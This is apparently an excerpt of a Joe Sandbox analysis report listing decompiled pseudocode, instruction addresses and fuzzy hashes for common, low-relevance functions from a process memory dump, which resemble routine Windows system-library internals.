				_v24 = _a12;
				if(E04CC3C40() == 0) {
					_t18 = 0x7ffe0386;
				} else {
					_t18 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22c;
				}
				_push( &_v72);
				_push(0x14);
				_push(0x402);
				_push( *_t18 & 0x000000ff);
				return E04CF4B50(E04CF2F90(), 0x1c22, _v12 ^ _t32, _t29, _t30, _t31);
			}

0x04d84c59
0x04d84c68
0x04d84c70
0x04d84c79
0x04d84c7c
0x04d84c80
0x04d84c83
0x04d84c86
0x04d84c89
0x04d84c8c
0x04d84c96
0x04d84ca8
0x04d84c98
0x04d84ca1
0x04d84ca1
0x04d84cb3
0x04d84cb4
0x04d84cb6
0x04d84cbb
0x04d84ccf

Memory Dump Source

Source File: 00000004.00000002.5838791509.0000000004C80000.00000040.00001000.00020000.00000000.sdmp, Offset: 04C80000, based on PE: true

Associated: 00000004.00000002.5838791509.0000000004DA9000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.5838791509.0000000004DAD000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_4c80000_control.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e2937d67d7840fe235adcc6eabcb7e004b46c0aa2a7fd7843e6b4edc6cdef2d0
Instruction ID: b5ab7307c1d03ecfd8406612866b63c2a6b4a411e0d2c808455bc243a3a7e954
Opcode Fuzzy Hash: e2937d67d7840fe235adcc6eabcb7e004b46c0aa2a7fd7843e6b4edc6cdef2d0
Instruction Fuzzy Hash: D5012CB1A11219AFDB04DFA9D9419EEB7F8EF58704F50405AFA00F7381E674E9018BA4

Uniqueness

Uniqueness Score: -1.00%

Function 04D36040 Relevance: .0, Instructions: 41
COMMON

Download Yara Rule

C-Code - Quality: 84%

			E04D36040(void* __ecx, signed char* _a4, signed int _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20, signed int _a24, char _a28) {
				void* _v8;
				void* _t14;
				void* _t15;
				signed int _t24;

				_push(__ecx);
				_t24 =  *((intOrPtr*)( *[fs:0x30] + 0x18));
				_t14 = E04D35D60(_a4, _a8, _a12, _a16,  &_v8);
				if(_t14 >= 0) {
					_t15 = E04CD6882(0, _v8, _a28, 0, 0, _a20, 0, 0xfffffffc, _a24, 0);
					E04CC3BC0(_t24, 0, _v8);
					_t14 = _t15;
				}
				return _t14;
			}

0x04d36045
0x04d3604d
0x04d36060
0x04d36067
0x04d36081
0x04d3608d
0x04d36092
0x04d36095
0x04d36098

Memory Dump Source

Source File: 00000004.00000002.5838791509.0000000004C80000.00000040.00001000.00020000.00000000.sdmp, Offset: 04C80000, based on PE: true

Associated: 00000004.00000002.5838791509.0000000004DA9000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.5838791509.0000000004DAD000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_4c80000_control.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0dd29ffe6cddaff40cdda75bcb1669297d52e5307dee62bf9dea0ffac2072810
Instruction ID: 9f094f1a1d86792bff818b1ca49450d2aca60d230dc23b164566995bdd4ce983
Opcode Fuzzy Hash: 0dd29ffe6cddaff40cdda75bcb1669297d52e5307dee62bf9dea0ffac2072810
Instruction Fuzzy Hash: A0F0127220000DBFEF119F94ED80DAF7BBEEB45298B104125FA1096120D731ED21A7A0

Uniqueness

Uniqueness Score: -1.00%

Function 04D6EE78 Relevance: .0, Instructions: 41
COMMON

Download Yara Rule

C-Code - Quality: 59%

			E04D6EE78(intOrPtr __ecx, intOrPtr __edx) {
				signed int _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				short _v42;
				char _v48;
				void* __edi;
				void* __esi;
				signed char* _t16;
				intOrPtr _t22;
				signed int _t24;
				intOrPtr _t29;
				void* _t30;
				intOrPtr _t31;
				intOrPtr _t32;
				signed int _t33;

				_t29 = __edx;
				_v8 =  *0x4dab370 ^ _t33;
				_t32 = __ecx;
				_t30 =  &_v48;
				_t24 = 0xa;
				memset(_t30, 0, _t24 << 2);
				_t31 = _t30 + _t24;
				_v16 = _t32;
				_v42 = 0x1036;
				_v12 = _t29;
				if(E04CC3C40() == 0) {
					_t16 = 0x7ffe0380;
				} else {
					_t16 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
				}
				_push( &_v48);
				_push(8);
				_push(0x20402);
				_push( *_t16 & 0x000000ff);
				return E04CF4B50(E04CF2F90(), _t22, _v8 ^ _t33, _t29, _t31, _t32);
			}

0x04d6ee78
0x04d6ee87
0x04d6ee8c
0x04d6ee8e
0x04d6ee95
0x04d6ee96
0x04d6ee96
0x04d6ee9d
0x04d6eea0
0x04d6eea4
0x04d6eeae
0x04d6eec0
0x04d6eeb0
0x04d6eeb9
0x04d6eeb9
0x04d6eecb
0x04d6eecc
0x04d6eece
0x04d6eed3
0x04d6eee6

Memory Dump Source

Source File: 00000004.00000002.5838791509.0000000004C80000.00000040.00001000.00020000.00000000.sdmp, Offset: 04C80000, based on PE: true

Associated: 00000004.00000002.5838791509.0000000004DA9000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.5838791509.0000000004DAD000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_4c80000_control.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d387f9d411c9e27f476bdd25dc352906cdd1471e5df1389f1d648d34f2cf7268
Instruction ID: 9e0613f02f1ebf328aad6966a59f168ae997b24ee373e12a174f016eac77f832
Opcode Fuzzy Hash: d387f9d411c9e27f476bdd25dc352906cdd1471e5df1389f1d648d34f2cf7268
Instruction Fuzzy Hash: 76F0C871B10258AFDB04DFB9D805AEEB7B9EF44714F00849AF511EB281EA74E9019750

Uniqueness

Uniqueness Score: -1.00%

Function 04D3A130 Relevance: .0, Instructions: 40
COMMON

Download Yara Rule

C-Code - Quality: 16%

			E04D3A130(intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20, intOrPtr _a24, intOrPtr _a28, intOrPtr _a32, intOrPtr _a36, intOrPtr _a40) {
				signed int _t24;
				intOrPtr* _t31;

				_t24 =  *( *[fs:0x30] + 0x68) & 0x02000100;
				if(_t24 != 0x2000000) {
					_t31 =  *0x4da5a44; // 0x0
					if(_t31 != 0) {
						 *0x4da91e0(_a4, _a8, _a12, _a16, _a20, _a24, _a28, _a32, _a36, _a40);
						_t24 =  *_t31();
					}
					return _t24;
				}
				return E04D3A1A7(_a4, _a8, _a12, _a16, _a20, _a24, _a28, _a32, _a36, _a40);
			}

0x04d3a13e
0x04d3a148
0x04d3a170
0x04d3a178
0x04d3a19a
0x04d3a1a0
0x04d3a1a0
0x00000000
0x04d3a1a2
0x00000000

Memory Dump Source

Source File: 00000004.00000002.5838791509.0000000004C80000.00000040.00001000.00020000.00000000.sdmp, Offset: 04C80000, based on PE: true

Associated: 00000004.00000002.5838791509.0000000004DA9000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.5838791509.0000000004DAD000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_4c80000_control.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 622ab7dc37a1faf5d5d721197d87aa7944fbd3ef4472db100a2a2873b11e20d1
Instruction ID: d7085a326508a7a5386f8160cd56fb1f55abdb13e6ebfb00fbe491f473f6d4d2
Opcode Fuzzy Hash: 622ab7dc37a1faf5d5d721197d87aa7944fbd3ef4472db100a2a2873b11e20d1
Instruction Fuzzy Hash: 4B019736601109ABDF129F84EC40EDA7FA6FB4C754F068101FE5866220C236ED70EB80

Uniqueness

Uniqueness Score: -1.00%

Function 04CE648A Relevance: .0, Instructions: 39
COMMON

Download Yara Rule

C-Code - Quality: 79%

			E04CE648A(signed int __edx) {
				char* _t10;
				intOrPtr _t12;
				signed char* _t15;
				signed int _t20;

				_t20 = __edx;
				if(E04CC3C40() != 0) {
					_t10 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22a;
				} else {
					_t10 = 0x7ffe0384;
				}
				if( *_t10 != 0) {
					if(( *( *[fs:0x30] + 0x240) & 0x00000004) != 0) {
						if(E04CC3C40() == 0) {
							_t15 = 0x7ffe0385;
						} else {
							_t15 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22b;
						}
						if(( *_t15 & 0x00000020) != 0) {
							E04D30227(0x1484, _t20 | 0xffffffff, _t20 | 0xffffffff, _t20 | 0xffffffff, 0, 0);
						}
					}
				}
				asm("lock inc dword [0x4da5db0]");
				_t12 =  *0x4da5d50; // 0x50
				if(_t12 != 0) {
					_push(0);
					_push(_t12);
					return E04CF2A70();
				}
				return _t12;
			}

0x04ce648a
0x04ce6491
0x04d2410b
0x04ce6497
0x04ce6497
0x04ce6497
0x04ce649f
0x04d24122
0x04d2412f
0x04d24141
0x04d24131
0x04d2413a
0x04d2413a
0x04d24149
0x04d2415d
0x04d2415d
0x04d24149
0x04d24122
0x04ce64a5
0x04ce64ac
0x04ce64b3
0x04ce64b5
0x04ce64b7
0x00000000
0x04ce64b8
0x04ce64bd

Memory Dump Source

Source File: 00000004.00000002.5838791509.0000000004C80000.00000040.00001000.00020000.00000000.sdmp, Offset: 04C80000, based on PE: true

Associated: 00000004.00000002.5838791509.0000000004DA9000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.5838791509.0000000004DAD000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_4c80000_control.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ae64ab1aaf7d4b1c8b2f8e613298e5b3bddeba96a8f3dd6a8629acfcb99eff07
Instruction ID: 2d5d473f0a1c2fcb237f0d8bab366aa7a1549014923d3823d2eba06862925d1d
Opcode Fuzzy Hash: ae64ab1aaf7d4b1c8b2f8e613298e5b3bddeba96a8f3dd6a8629acfcb99eff07
Instruction Fuzzy Hash: AB01A470740690ABF727DB29DE48B3533EAFB20B18F484194FD01AB6D2E76CF8008214

Uniqueness

Uniqueness Score: -1.00%

Function 04CAC090 Relevance: .0, Instructions: 39
COMMON

Download Yara Rule

C-Code - Quality: 82%

			E04CAC090(intOrPtr _a4) {
				void* __ecx;
				void* _t8;
				signed int _t9;
				void* _t10;
				intOrPtr _t11;
				signed int _t12;
				signed int _t13;
				intOrPtr _t15;

				_t15 =  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0x10)) + 0x294));
				_t8 = E04D061D5();
				_t12 = 0;
				if(_t8 != 0) {
					_push(5);
				} else {
					_t12 = 1;
					_push(4);
				}
				_pop(_t9);
				if(_a4 == 0) {
					_t11 = 0x4c86e30;
					_t13 = _t9;
				} else {
					_t11 = 0x4c86e20;
					if(_t12 == 0) {
						_t11 = 0x4c86e58;
					}
					_t13 = (_t12 ^ 0x00000001) + 3;
				}
				_t10 = E04CB2EE8(_t11, _t13, 0, 0);
				if(_t10 != 0) {
					 *((intOrPtr*)(_t10 + 0x38)) = _t15;
					 *((char*)(_t10 + 0x48)) = 0;
					return _t10;
				}
				return _t10;
			}

0x04cac0a0
0x04cac0a6
0x04cac0ab
0x04cac0af
0x04cac0b6
0x04cac0b1
0x04cac0b1
0x04cac0b2
0x04cac0b2
0x04cac0bc
0x04cac0bd
0x04cac0d5
0x04cac0da
0x04cac0bf
0x04cac0bf
0x04cac0c6
0x04cac0c8
0x04cac0c8
0x04cac0d0
0x04cac0d0
0x04cac0e0
0x04cac0e7
0x04cac0e9
0x04cac0ec
0x00000000
0x04cac0ec
0x04cac0f3

Memory Dump Source

Source File: 00000004.00000002.5838791509.0000000004C80000.00000040.00001000.00020000.00000000.sdmp, Offset: 04C80000, based on PE: true

Associated: 00000004.00000002.5838791509.0000000004DA9000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.5838791509.0000000004DAD000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_4c80000_control.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e543f8de1957b25bf7f10c6d09351b9f8bc9355a727a40728beccad1aceac019
Instruction ID: 2eb1923864c3808aa1e5bbb221f128bd215c9c6d936e0428c2a01c498b3cf744
Opcode Fuzzy Hash: e543f8de1957b25bf7f10c6d09351b9f8bc9355a727a40728beccad1aceac019
Instruction Fuzzy Hash: C1F024727443425BF324E60ACD00B637387E7C071DF29806AEA059F2D1EA71FD118255

Uniqueness

Uniqueness Score: -1.00%

Function 04D84F7C Relevance: .0, Instructions: 39
COMMON

Download Yara Rule

C-Code - Quality: 52%

			E04D84F7C(intOrPtr __ecx, intOrPtr __edx) {
				signed int _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				intOrPtr _v28;
				intOrPtr _v32;
				short _v58;
				char _v64;
				signed char* _t24;
				intOrPtr _t30;
				intOrPtr _t36;
				intOrPtr _t37;
				signed int _t38;

				_t35 = __edx;
				_v8 =  *0x4dab370 ^ _t38;
				_v24 = __ecx;
				_v58 = 0x1c30;
				_v32 =  *((intOrPtr*)(__edx + 0xc8));
				_v28 =  *((intOrPtr*)(__edx + 0xcc));
				_v16 =  *((intOrPtr*)(__edx + 0xd8));
				_v20 = __edx;
				_v12 =  *((intOrPtr*)(__edx + 0xd4));
				if(E04CC3C40() == 0) {
					_t24 = 0x7ffe0386;
				} else {
					_t24 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22c;
				}
				_push( &_v64);
				_push(0x18);
				_push(0x402);
				_push( *_t24 & 0x000000ff);
				return E04CF4B50(E04CF2F90(), _t30, _v8 ^ _t38, _t35, _t36, _t37);
			}

0x04d84f7c
0x04d84f8b
0x04d84f93
0x04d84f96
0x04d84fa0
0x04d84fa9
0x04d84fb2
0x04d84fbb
0x04d84fbe
0x04d84fc8
0x04d84fda
0x04d84fca
0x04d84fd3
0x04d84fd3
0x04d84fe5
0x04d84fe6
0x04d84fe8
0x04d84fed
0x04d84ffe

Memory Dump Source

Source File: 00000004.00000002.5838791509.0000000004C80000.00000040.00001000.00020000.00000000.sdmp, Offset: 04C80000, based on PE: true

Associated: 00000004.00000002.5838791509.0000000004DA9000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.5838791509.0000000004DAD000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_4c80000_control.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 80a8a44763c03aac168a82c160a18944c03f70bfa12f7c17680e2eec5eb45976
Instruction ID: 556464d93bfb1e30552f787fe94556253100ff8b83b75061bae5861841da8da2
Opcode Fuzzy Hash: 80a8a44763c03aac168a82c160a18944c03f70bfa12f7c17680e2eec5eb45976
Instruction Fuzzy Hash: 71011E70E0020A9FDB44DFA8D545BAEF7F4FF08304F1481AAE519EB381E634EA409B94

Uniqueness

Uniqueness Score: -1.00%

Function 04D3E4F2 Relevance: .0, Instructions: 36
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E04D3E4F2(intOrPtr* __ecx) {
				void* _t4;
				intOrPtr* _t5;
				void* _t7;
				intOrPtr* _t12;
				intOrPtr* _t15;
				intOrPtr* _t17;

				_t17 = __ecx;
				if(__ecx != 0) {
					_t15 =  *__ecx;
					while(1) {
						_t5 =  *((intOrPtr*)(_t17 + 8));
						if(_t5 == 0) {
							goto L6;
						}
						_t12 =  *_t5;
						while(1) {
							E04CC3BC0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t5);
							_t5 = _t12;
							if(_t12 == 0) {
								goto L6;
							}
							_t12 =  *_t12;
						}
						L6:
						_t7 = E04CC3BC0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t17);
						_t17 = _t15;
						if(_t15 == 0) {
							return _t7;
						}
						_t15 =  *_t15;
					}
				}
				return _t4;
			}

0x04d3e4f5
0x04d3e4f9
0x04d3e4fc
0x04d3e4ff
0x04d3e4ff
0x04d3e504
0x00000000
0x00000000
0x04d3e506
0x04d3e508
0x04d3e514
0x04d3e519
0x04d3e51d
0x00000000
0x00000000
0x04d3e51f
0x04d3e51f
0x04d3e523
0x04d3e52f
0x04d3e534
0x04d3e538
0x00000000
0x04d3e53f
0x04d3e53a
0x04d3e53a
0x04d3e4ff
0x04d3e541

Memory Dump Source

Source File: 00000004.00000002.5838791509.0000000004C80000.00000040.00001000.00020000.00000000.sdmp, Offset: 04C80000, based on PE: true

Associated: 00000004.00000002.5838791509.0000000004DA9000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.5838791509.0000000004DAD000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_4c80000_control.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2d61a3bfed072bebc3533729a18c2e1d60e765f99e10e027ec57f31171bb3125
Instruction ID: 41f0262201b31bf7ad869651a3d5b1168958b845ab33c8bba474ae6f42fd6a13
Opcode Fuzzy Hash: 2d61a3bfed072bebc3533729a18c2e1d60e765f99e10e027ec57f31171bb3125
Instruction Fuzzy Hash: 54F0E2337006529BD7318A0DEC94F12B3B9BF84B20F190428E9049B2A0D760FC02CBD0

Uniqueness

Uniqueness Score: -1.00%

Function 04D3C51D Relevance: .0, Instructions: 36
COMMON

Download Yara Rule

C-Code - Quality: 48%

			E04D3C51D(intOrPtr __ecx, intOrPtr _a4, signed int _a8) {
				signed int _v8;
				intOrPtr _v20;
				signed int _v24;
				intOrPtr _v28;
				short _v54;
				signed char* _t15;
				intOrPtr _t21;
				intOrPtr _t27;
				intOrPtr _t28;
				signed int _t29;
				signed int _t31;

				_t31 = (_t29 & 0xfffffff8) - 0x38;
				_v8 =  *0x4dab370 ^ _t31;
				_t26 = _a8;
				_v54 = 0xd24;
				_v28 = _a4;
				_v24 = _a8;
				_v20 = __ecx;
				if(E04CC3C40() == 0) {
					_t15 = 0x7ffe038e;
				} else {
					_t15 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x234;
				}
				_push(_t31);
				_push(0xc);
				_push(0x20402);
				_push( *_t15 & 0x000000ff);
				return E04CF4B50(E04CF2F90(), _t21, _v24 ^ _t31, _t26, _t27, _t28);
			}

0x04d3c525
0x04d3c52f
0x04d3c533
0x04d3c53b
0x04d3c543
0x04d3c547
0x04d3c54b
0x04d3c556
0x04d3c568
0x04d3c558
0x04d3c561
0x04d3c561
0x04d3c573
0x04d3c574
0x04d3c576
0x04d3c57b
0x04d3c58f

Memory Dump Source

Source File: 00000004.00000002.5838791509.0000000004C80000.00000040.00001000.00020000.00000000.sdmp, Offset: 04C80000, based on PE: true

Associated: 00000004.00000002.5838791509.0000000004DA9000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.5838791509.0000000004DAD000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_4c80000_control.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: cbe8358a43f92bf33fc0adc654b90271a006705fea7db5a2b0405aa9241d4e98
Instruction ID: 62e1fe55a0d6f4f044ef4fb9708a1ca9aa8bea7138b259176bc9928199eecfc0
Opcode Fuzzy Hash: cbe8358a43f92bf33fc0adc654b90271a006705fea7db5a2b0405aa9241d4e98
Instruction Fuzzy Hash: 6DF0FF712143009FC314EF28C805A1BB7E4EF88B04F404A5EF8A8DB380E638F910C786

Uniqueness

Uniqueness Score: -1.00%

Function 04CE0774 Relevance: .0, Instructions: 35
COMMON

Download Yara Rule

C-Code - Quality: 68%

			E04CE0774(signed int** __edx, void* __eflags) {
				char _v8;
				void* __ecx;
				signed int* _t9;
				void* _t11;
				void* _t12;
				signed int* _t13;
				signed int** _t20;

				_push(_t11);
				_v8 = 0x10;
				_push( &_v8);
				_t20 = __edx;
				_t12 = 0x10;
				if(E04CA94A3(_t12, _t11) < 0) {
					L4:
					_t9 = 0;
				} else {
					_t9 = E04CC5D90(_t12,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _v8);
					if(_t9 == 0) {
						goto L4;
					} else {
						 *_t9 =  *_t9 & 0x00000000;
						_t5 =  &(_t9[2]); // 0x8
						_t13 = _t5;
						 *_t13 = 1;
						_t9[2] = 0;
						 *_t20 = _t13;
					}
				}
				return _t9;
			}

0x04ce0779
0x04ce077e
0x04ce0785
0x04ce0786
0x04ce078c
0x04ce0794
0x04ce07c6
0x04ce07c6
0x04ce0796
0x04ce07a4
0x04ce07ab
0x00000000
0x04ce07ad
0x04ce07ad
0x04ce07b0
0x04ce07b0
0x04ce07b6
0x04ce07bb
0x04ce07bf
0x04ce07bf
0x04ce07ab
0x04ce07c3

Memory Dump Source

Source File: 00000004.00000002.5838791509.0000000004C80000.00000040.00001000.00020000.00000000.sdmp, Offset: 04C80000, based on PE: true

Associated: 00000004.00000002.5838791509.0000000004DA9000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.5838791509.0000000004DAD000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_4c80000_control.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1b7835e4d6d6559359274cfa51e41153a2ed1920ea28c928af81b6d046f1638e
Instruction ID: 2ecf58fe6589378a5d1c72b25645ecb25f887fb47d4bfdd8fab59518a2f2eafd
Opcode Fuzzy Hash: 1b7835e4d6d6559359274cfa51e41153a2ed1920ea28c928af81b6d046f1638e
Instruction Fuzzy Hash: 08F0B472610204AFE324DB23CD45B56B3EAEF9C714F1584789405D7160FBB1FE00D654

Uniqueness

Uniqueness Score: -1.00%

Function 04D6EF66 Relevance: .0, Instructions: 35
COMMON

Download Yara Rule

C-Code - Quality: 48%

			E04D6EF66(intOrPtr __ecx, intOrPtr __edx, intOrPtr _a4, intOrPtr _a8) {
				signed int _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				short _v50;
				char _v56;
				signed char* _t18;
				intOrPtr _t24;
				intOrPtr _t30;
				intOrPtr _t31;
				signed int _t32;

				_t29 = __edx;
				_v8 =  *0x4dab370 ^ _t32;
				_v20 = _a4;
				_v12 = _a8;
				_v24 = __ecx;
				_v16 = __edx;
				_v50 = 0x1021;
				if(E04CC3C40() == 0) {
					_t18 = 0x7ffe0380;
				} else {
					_t18 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
				}
				_push( &_v56);
				_push(0x10);
				_push(0x20402);
				_push( *_t18 & 0x000000ff);
				return E04CF4B50(E04CF2F90(), _t24, _v8 ^ _t32, _t29, _t30, _t31);
			}

0x04d6ef66
0x04d6ef75
0x04d6ef7b
0x04d6ef81
0x04d6ef89
0x04d6ef8c
0x04d6ef8f
0x04d6ef9a
0x04d6efac
0x04d6ef9c
0x04d6efa5
0x04d6efa5
0x04d6efb7
0x04d6efb8
0x04d6efba
0x04d6efbf
0x04d6efd0

Memory Dump Source

Source File: 00000004.00000002.5838791509.0000000004C80000.00000040.00001000.00020000.00000000.sdmp, Offset: 04C80000, based on PE: true

Associated: 00000004.00000002.5838791509.0000000004DA9000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.5838791509.0000000004DAD000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_4c80000_control.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: df7e98f47c297320380723db44cd302e449a29f0dc021c19303fca47a21385f9
Instruction ID: af9f4ef7eb98592b8acde80eaede73f34db2533ae9d67fa3081d3f06cadcfc8b
Opcode Fuzzy Hash: df7e98f47c297320380723db44cd302e449a29f0dc021c19303fca47a21385f9
Instruction Fuzzy Hash: BEF04F74A10248EFDB44EFA9D945A9EB7F4EF48304F00805AF945EB381E674EA00DB54

Uniqueness

Uniqueness Score: -1.00%

Function 04D3C592 Relevance: .0, Instructions: 34
COMMON

Download Yara Rule

C-Code - Quality: 46%

			E04D3C592(intOrPtr __ecx, intOrPtr _a4, intOrPtr _a8) {
				signed int _v8;
				intOrPtr _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				short _v50;
				char _v56;
				signed char* _t16;
				intOrPtr _t22;
				intOrPtr _t28;
				intOrPtr _t29;
				signed int _t30;

				_v8 =  *0x4dab370 ^ _t30;
				_t27 = _a8;
				_v50 = 0xd23;
				_v24 = _a4;
				_v20 = _a8;
				_v16 = __ecx;
				if(E04CC3C40() == 0) {
					_t16 = 0x7ffe038e;
				} else {
					_t16 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x234;
				}
				_push( &_v56);
				_push(0xc);
				_push(0x20402);
				_push( *_t16 & 0x000000ff);
				return E04CF4B50(E04CF2F90(), _t22, _v8 ^ _t30, _t27, _t28, _t29);
			}

0x04d3c5a1
0x04d3c5a4
0x04d3c5ac
0x04d3c5b3
0x04d3c5b6
0x04d3c5b9
0x04d3c5c3
0x04d3c5d5
0x04d3c5c5
0x04d3c5ce
0x04d3c5ce
0x04d3c5e0
0x04d3c5e1
0x04d3c5e3
0x04d3c5e8
0x04d3c5f9

Memory Dump Source

Source File: 00000004.00000002.5838791509.0000000004C80000.00000040.00001000.00020000.00000000.sdmp, Offset: 04C80000, based on PE: true

Associated: 00000004.00000002.5838791509.0000000004DA9000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.5838791509.0000000004DAD000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_4c80000_control.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 08a11e777940d7609fcefcee6ae4e38120d6e51da323e036898201a2044eefca
Instruction ID: c4039bd244459f1e675720aa58db3a527e58aa7ee37ad36bffe25d4e9f38fa13
Opcode Fuzzy Hash: 08a11e777940d7609fcefcee6ae4e38120d6e51da323e036898201a2044eefca
Instruction Fuzzy Hash: A0F06270A11248DFDB04EF68D915A5EB7B5EF18704F00805AF915EB385EA38FA01DB50

Uniqueness

Uniqueness Score: -1.00%

Function 04CB471B Relevance: .0, Instructions: 33
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E04CB471B(void* __ecx, intOrPtr _a4) {
				void* __esi;
				void* __ebp;
				void* _t17;
				void* _t19;
				void* _t20;
				void* _t21;

				_t18 = __ecx;
				_t21 = __ecx;
				if(__ecx == 0 ||  *((char*)(__ecx + 0xdd)) != 0 || E04CC1BC4(__ecx, _t19) == 0 ||  *((intOrPtr*)(__ecx + 4)) != 0x4c81090 ||  *((char*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0x28)) != 0) {
					if(_a4 != 0 ||  *((char*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0x28)) == 0) {
						E04D84A6D(_t17, _t18, _t19, _t20, _t21);
					}
					return 0;
				} else {
					return 1;
				}
			}

0x04cb471b
0x04cb4721
0x04cb4725
0x04cb475d
0x04cb4772
0x04cb4772
0x00000000
0x04cb4751
0x00000000
0x04cb4753

Memory Dump Source

Source File: 00000004.00000002.5838791509.0000000004C80000.00000040.00001000.00020000.00000000.sdmp, Offset: 04C80000, based on PE: true

Associated: 00000004.00000002.5838791509.0000000004DA9000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.5838791509.0000000004DAD000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_4c80000_control.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8cbd812625538af1ecf48438eafc7ac5b6223d834a6c15e14dbe73b035f02b2a
Instruction ID: 03add0a05c7a4c46ddf31b8307e9a4708e03e5facf359f13d98599e445a71fe3
Opcode Fuzzy Hash: 8cbd812625538af1ecf48438eafc7ac5b6223d834a6c15e14dbe73b035f02b2a
Instruction Fuzzy Hash: F1F024B190D2A09EEB359724C004BE177E6DB03374F0C486ACCA9AB513C320FE84C6D9

Uniqueness

Uniqueness Score: -1.00%

Function 04CEC50D Relevance: .0, Instructions: 31
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E04CEC50D(void* __ebx, void* __ecx, void* __edi, intOrPtr _a4) {
				void* __esi;
				void* __ebp;
				void* _t16;
				void* _t18;
				void* _t19;
				void* _t20;

				_t19 = __edi;
				_t17 = __ecx;
				_t16 = __ebx;
				_t20 = __ecx;
				if(__ecx == 0 || E04CC1BC4(__ecx, _t18) == 0 ||  *((intOrPtr*)(__ecx + 4)) != 0x4c8114c ||  *((char*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0x28)) != 0) {
					if(_a4 != 0 ||  *((char*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0x28)) == 0) {
						E04D84A6D(_t16, _t17, _t18, _t19, _t20);
					}
					return 0;
				} else {
					return 1;
				}
			}

0x04cec50d
0x04cec50d
0x04cec50d
0x04cec513
0x04cec517
0x04cec53e
0x04cec55b
0x04cec55b
0x00000000
0x04cec556
0x00000000
0x04cec558

Memory Dump Source

Source File: 00000004.00000002.5838791509.0000000004C80000.00000040.00001000.00020000.00000000.sdmp, Offset: 04C80000, based on PE: true

Associated: 00000004.00000002.5838791509.0000000004DA9000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.5838791509.0000000004DAD000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

